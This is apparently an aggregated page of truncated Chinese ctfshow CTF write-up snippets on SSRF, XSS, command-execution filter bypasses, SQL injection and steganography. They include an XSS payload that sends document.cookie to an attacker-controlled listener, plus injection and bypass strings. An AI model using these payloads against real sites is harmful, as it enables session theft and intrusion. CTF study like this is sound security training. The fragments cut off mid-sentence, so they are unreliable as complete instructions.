文章目录 认识SSRFweb351web352web353web354web355web356web357web358web359、web360 认识SSRF 浅谈SSRF漏洞 SSRF详解 SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网
web1 右键查看源码 得到flag web2 无法查看源代码 通过Ctrl+u或者在url前面添加view-source:也可获得flag 或直接bp抓包得到flag web3 bp抓包查看响应头得到flag web4 看提示 直接url后加robots.txt然后根据网页提示得到flag web5 直接url后加index.phps可参
web 316(反射型) 测试<script>alert(1)</script>,无过滤 在服务器上开启监听 python3 -m http.server 39543 外带数据: <script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script> <script>window.location.href="http://x.xx.xx
命令执行 命令执行常见做题姿势 *或?代替文件名全拼用其它的命令执行函数代替被过滤的函数用已知参数传入另一个无限制参数,构造木马编码绕过include 不用括号 分号可用?>代替cat替换内部字段分隔符$IFSgrep通配符匹配无字母数字的webshell$(( ))与整数运算脚本复制重命名绕过f
空格绕过 >` `<` `<>` 重定向符 `%09`(需要php环境) `${IFS}` `$IFS$9` `{cat,flag.php}` //用逗号实现了空格功能 `%20` `%09 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-0
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:32:01 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:32:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$
shell重定向 /dev/null 2>&1 让所有的输出流(包括错误的和正确的)都定向到空设备丢弃 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email: h1xa@ctfer.com #
之前就想着写一下 ctfshow 的 wp, 但由于时间问题,一直没有机会, 其实是懒≥.≤ 这次趁着寒假刷几篇ctfshow的文章 那,开始吧。 web351 存在一个flag.php页面,访问会返回不是本地用户的消息, 那我们直接以本地用户去探测内网下的flag.php就可以了 url=http://127.0.0.1/flag.php w
ctfshowweb5 进入题目 <?php $flag=""; $v1=$_GET['v1']; $v2=$_GET['v2']; if(isset($v1) && isset($v2)){ if(!ctype_alpha($v1)){ die("v1 error");
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(i
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 02:22:27 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // error_reporting(0); if(isset($_GET['c
目录 web14(默认配置) web15(社会工程学) web16(探针泄露) web17(sql备份) wed18(js小游戏) web19(数据库泄露) web20(mbd文件) 杂项5 杂项6 , 杂项6 杂项7 杂项8 杂项10 杂项11 隐写1 隐写2 萌新隐写5 web14(默认配置) 那我们访问editor,出现如下页面 在图片里面找到fl000g.txt,
strpos函数限制了传参第一位不能为0,如果为0,就die. 但是如果找不到的话又会die. <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:46:19 # @link: https://ctfer.com */
thinkphp完全开发手册 https://www.kancloud.cn/manual/thinkphp/1678 569 pathinfo的运用 四种模式 1.普通模式也就是传统的GET传参方式来指定当前访问的模块和操作,例如: http://localhost/?m=home&c=user&a=login&var=value m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参
半年没做过pwn题了,试着用这个比赛的题来捡一捡知识点。 dota main函数中需要绕过两个判断才能进入存在漏洞的函数。 第一个判断很简单,输入“dota”就行了。 第二个判断,需要先让v5小于0,在经过v5=-v5之后,继续让v5小于0,看看汇编是怎么样的。 NEG是汇编指令中的求
MISC中的图片隐写,一般都是将flag隐藏在图片文件中,本文先列举几个简单的方法,之后有时间的话,我写个图片隐写的总结~ 一、隐写方法简介: 1.修改文件后缀名,例:jpg改成txt,flag藏图片中,见【misc4】 2.将文本隐藏在图片的二进制文件中(包含了图片和txt文件合并),见【misc5】、【misc6】、
[ctfshow 2021摆烂杯] FORENSICS部分 writeup 套的签到题第一段flag第二段flag第三段flag JiaJia-CP-1JiaJia-CP-2JiaJia-CP-3JiaJia-PC-1JiaJia-PC-2JiaJia-PC-3 官方的wp:https://qgieod1s9b.feishu.cn/docs/doccnC4EpMhSv1Ni6mbL7BQQdBc 套的签到题 这是你沐师傅的站
ctfshow web2 1.手动注入题。先用万能密码admin' or 1=1%23,有回显 2.union select注入,2处有回显 3.依次查找数据库、表、字段 得到flag ctfshow web3 http://input伪协议 1.提示了要用?url注入,所以用?url=php://input传入伪协议,作用是执行POST传入的代码 2.抓包,传
代码写的确实丑,echo !()?xxx:yyy,首先这是一个三目运算符问号前面是一个判断语句,若为true则用echo xxx,若为false则echo yyy. 很明显xxx就是flag所在的位置,所以要使得`!()`为真括号内的要为假,即每个数据为假 在绕之前需要了解几个函数: stripos() eregi() file_get_content
目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 21:38:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporti
目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-18 17:41:33 */ highlight_file(__FILE__); if(isset($_GET['v1']) && isset($
目录 源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-18 16:21:15 */ highlight_file(__FILE__); if(isset($_GET['v1']) && isset($_
根据cookie里面的提示,get传入looklook参数 代码就是无符号命令执行,注意数字1到3和大写字母C没过滤 ~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造 payload ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$